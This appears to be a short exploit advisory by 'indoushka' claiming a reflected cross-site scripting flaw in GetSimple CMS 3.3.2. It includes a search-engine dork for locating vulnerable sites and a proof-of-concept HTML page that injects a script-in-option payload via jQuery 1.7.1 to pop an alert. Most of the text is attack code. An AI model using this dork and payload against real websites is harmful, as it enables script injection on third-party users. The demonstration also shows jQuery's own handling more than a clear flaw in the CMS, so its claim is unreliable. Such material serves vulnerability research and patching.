GetSimple CMS version 3.3.2 suffers from a cross site scripting vulnerability.
====================================================================================================================================
| # Title : GetSimple CMS v3.3.2 XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |
| # Vendor : http://get-simple.info/ |
| # Dork : © 2009-2014 GetSimple CMS – Version 3.3.2 |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] LIne 5 Se7 y0ur T@rg3t .
[+] XSS Reflected - Jquery v1.7.1 :
<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - Jquery v1.7.1 </title>
<script src="https://127.0.0.1/GetSimpleCMS/admin/template/js/jquery.min.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>
<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script>alert('xss
reflected - jquery v1.7.1 by - indoushka thnx to
@firebitsbr - [email protected]');</script></option>
</select>
</p>
</form>
</body>
</html>
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================